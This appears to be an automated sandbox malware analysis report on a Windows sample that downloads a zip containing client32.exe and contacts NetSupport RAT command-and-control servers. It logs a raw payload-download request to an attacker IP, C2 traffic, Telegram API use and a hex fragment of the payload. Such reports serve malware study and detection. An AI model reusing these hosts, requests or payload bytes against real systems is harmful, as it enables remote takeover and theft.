                                Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1716837900.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: BUenB12U2a.exe, 00000000.00000003.1732832574.000001E234146000.00000004.00000020.00020000.00000000.sdmp, BUenB12U2a.exe, 00000001.00000002.2031012733.0000020E46B20000.00000002.00000001.01000000.00000007.sdmp
                                Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdbGCTL source: BUenB12U2a.exe, 00000000.00000003.1718108034.000001E234146000.00000004.00000020.00020000.00000000.sdmp
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA192F0 FindFirstFileExW,FindClose,0_2_00007FF76CA192F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA183B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF76CA183B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 0_2_00007FF76CA318E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF76CA318E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA192F0 FindFirstFileExW,FindClose,1_2_00007FF76CA192F0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA318E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF76CA318E4
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FF76CA183B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF76CA183B0
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: 1_2_00007FFDFB7A0340 FindFirstFileExW,WideCharToMultiByte,GetLastError,WideCharToMultiByte,GetLastError,FindNextFileW,FindClose,FindClose,FindClose,1_2_00007FFDFB7A0340
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBE0F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBE0F84
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDEFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBDEFE1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDCA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,6_2_6CBDCA9B
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBE0B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBE0B33
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBE0702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBE0702
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDC775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,6_2_6CBDC775
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBA7C6D _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBA7C6D
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDFD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBDFD86
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDDF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,6_2_6CBDDF35
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDF8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBDF8B5
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDDA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,6_2_6CBDDA38
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDD4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,6_2_6CBDD4FF
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDF40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6CBDF40B
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 4x nop then add byte ptr [edi], dh6_2_6CB98468
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 4x nop then push esi6_2_6CB8F640

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49733 -> 64.190.113.159:1488
                                Uses known network protocols on non-standard ports
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49733
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 1488 -> 49733
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 1488
                                Uses the Telegram API (likely for C&C communication)
                                Source: unknownDNS query: name: api.telegram.org
                                Source: global trafficTCP traffic: 192.168.2.4:49733 -> 64.190.113.159:1488
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                                Source: Joe Sandbox ViewIP Address: 104.26.1.231 104.26.1.231
                                Source: Joe Sandbox ViewASN Name: TRAVELCLICKCORP1US TRAVELCLICKCORP1US
                                Source: unknownDNS query: name: api.ipify.org
                                Source: unknownDNS query: name: api.ipify.org
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: unknownTCP traffic detected without corresponding DNS query: 147.45.198.181
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 22 Feb 2025 01:46:43 GMTContent-Type: application/zipContent-Length: 2186234Last-Modified: Thu, 13 Feb 2025 23:11:45 GMTConnection: keep-aliveETag: "67ae7c31-215bfa"Accept-Ranges: bytesData Raw: 50 4b 03 04 14 00 00 00 08 00 8d 68 44 43 9d 9e 25 e6 21 6c 00 00 90 95 01 00 0c 00 00 00 63 6c 69 65 6e 74 33 32 2e 65 78 65 ec 7c 07 58 54 47 f7 fe 59 7a 97 22 2a 31 f9 2c 9f 26 c6 44 a3 89 f1 1f 45 11 45 ec 82 f4 b2 4b 59 96 6a 45 05 d4 28 89 25 c9 a7 62 8d 1a 8d c6 c4 28 d2 17 a4 58 c0 5e a2 62 d4 18 5b 62 8f c6 42 ef 9d c5 f3 3f 33 bb 4b 51 b0 62 e2 ef 79 3c 77 df 7b 67 ee 9c 39 33 f7 be 67 ce cc 5c 7c 1c ef be 0a 54 01 40 8d 80 08 b0 07 e4 62 09 4f 97 bf 08 06 9d 32 0c 20 4d fb 4c 97 3d 82 71 67 ba 38 06 06 cd ec 1c 3c 63 5a c0 0c f1 94 ce 12 f1 d4 a9 d3 42 3a fb f8 75 9e 11 3a b5 73 d0 d4 ce c3 6d 1d 3a 4f 99 e6 eb d7 5b 5f 5f a7 9b c2 46 ed 29 cd 43 07 e3 83 d6 28 b1 eb 42 cd 9a fd 74 8d ec 5f be 66 1f bf 17 b8 26 83 e7 8f ac 39 c0 af a5 8a 6b 19 bf da 07 49 02 59 bd 96 fa 38 c1 1a 60 9c 40 0d b6 05 8d b7 6f e8 b7 8a 40 57 a0 03 a0 42 99 30 01 bf d7 d9 90 4e 0c 9d 41 fe f4 86 c0 cb d5 41 5e ae bc c2 21 01 7f 59 83 02 55 a8 d8 f2 6b ae c8 74 eb af f5 17 2e 83 c8 de 20 96 e8 43 55 a7 0b 1a 0a e6 09 60 95 19 5d 77 08 a0 2d 6b 96 f4 de 86 e7 90 a7 e8 f7 0e f1 9b 1d c2 cc 03 d4 3f 0b a8 3d 66 c2 bb f7 0c 5f 71 88 18 c0 59 20 bf c1 f5 34 1a 74 14 6f c3 b2 f7 8c 99 33 24 a0 78 06 7a 16 98 41 57 ad e6 f4 fc 26 4f 23 c5 c9 20 7f 36 6e ef 73 c1 a3 7a c3 e0 8d bc 16 e2 14 91 17 61 dd 36 62 bc e1 04 bb ac 8d 94 f7 38 62 08 a7 1b 09 95 2f ca 1b ee 8c a6 d0 d9 12 22 8a 96 6a 0c ea 1a da 69 e9 08 c1 88 af 0e 85 b4 59 3e 1a 06 75 0d d1 97 67 43 cb e6 5b 74 0d d5 1f 91 ab 33 a8 73 98 c6 88 f9 16 9d 67 d5 2c d5 20 35 bd 41 9d 67 69 29 75 96 5b ef 9b 70 c2 3a 8b 35 8d a6 7a 64 b3 c2 3a 4b d0 66 b7 75 5e a8 fa 1e 1d 36 5e 9d 27 c2 44 2a d2 a2 a2 09 59 9e 88 38 01 4d d5 28 73 1a bb b7 ed fc 2c 51 e9 8d 3c 8f dc a7 31 9f 42 38 44 b8 d8 59 7e 6f 6d e7 26 2a f5 b1 93 0d 65 1b 82 56 17 82 26 c0 b2 46 7a 51 94 6e 4b 98 dd e8 5e 55 67 45 4c 69 46 9e d4 ae 0a 78 d9 38 8c b7 9a 1c e4 37 35 e4 93 8f 2d 3f 23 af b0 1a 6d 35 ee 93 8f 7b fb 4e 9e 0c 66 02 eb d9 41 21 13 66 4c 93 f8 cd 9c 09 a6 2a 23 fd 42 c6 4f f3 0d 9d ec 37 4a 3c d5 77 b2 df 50 00 1f 76 cf 21 44 3c 23 24 34 78 f4 54 ff 69 43 e1 1b 01 dd b1 9a 36 65 0a a9 8c 0b 9a 4a 4a 63 ad ed 6d ac 95 26 49 ec 1d 86 3b 5c 1b 5c d7 bf eb a7 f9 a3 97 67 1a c4 0e 36 d9 e6 cf a2 96 f5 40 d1 d4 99 53 66 ce 90 b0 8b a8 ef c7 7d fa c8 4f 12 45 ef 44 f6 7e 93 fd c4 33 fd ea 6f f4 0e f6 f5 81 ff 7b 22 9f 1a d4 f9 5a 80 5e f8 7c 36 05 2c a6 ab 01 5d b7 d0 d5 10 f8 da 60 7e 07 ba 9e a3 6b d3 7a 5a 7c 76 cc a2 fb cc 47 28 33 9f d9 e9 40 57 56 de 87 ae ea 74 1d 25 90 db f5 a6 2b b9 0f cc a6 2b 9b 42 56 09 1e b5 27 e0 73 56 4c 33 f7 b3 55 f9 14 fc d8 7d d6 fe 9f 2d dc 2f 6a ce 3e 35 ac a5 02 d0 dc fd 0e 2d dc ef d1 c2 fd cf 5a b8 3f aa 85 fb ae 2d dc 0f 6c e1 fe ec 16
                                Source: global trafficHTTP traffic detected: GET /build2.zip HTTP/1.1Host: 147.45.198.181User-Agent: python-requests/2.22.0Accept-Encoding: gzip, deflateAccept: */*Connection: keep-alive
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                                Source: unknownHTTP traffic detected: POST http://64.190.113.159/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 64.190.113.159Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 22 Feb 2025 01:46:49 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 915b4df82e8718c4-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QrQNRjKSFqsXh8uloYi4w2Pe1MPGHuWD0k7JjWgKz92gJW%2ByRW%2BjgUqdjlh6qsUUNuuO9ROtxOWVK%2BwRtL8VySB1S%2FbjCberCiotIx0NJZAvfQ1eJmyktQEeyKT5nc1UyW7LKtluPj1QY8IC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1544&min_rtt=1544&rtt_var=772&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 22 Feb 2025 01:46:50 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 915b4dfe49622363-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hIWA08BEoZcQh2C%2BH6UkXDWo%2FMmD7v0e9zMQD7Ezhw%2B3nIVxcSgSCT%2FqxgIuLKI%2FTMqbVZ%2F3tKTO2V%2BxeAr0Ye%2BE46IWOEecf8GYrbfcjqyR4NoNJTaVxEjAtiastOj4Jb9VefigTYSA%2FsFp"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1872&min_rtt=1872&rtt_var=936&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
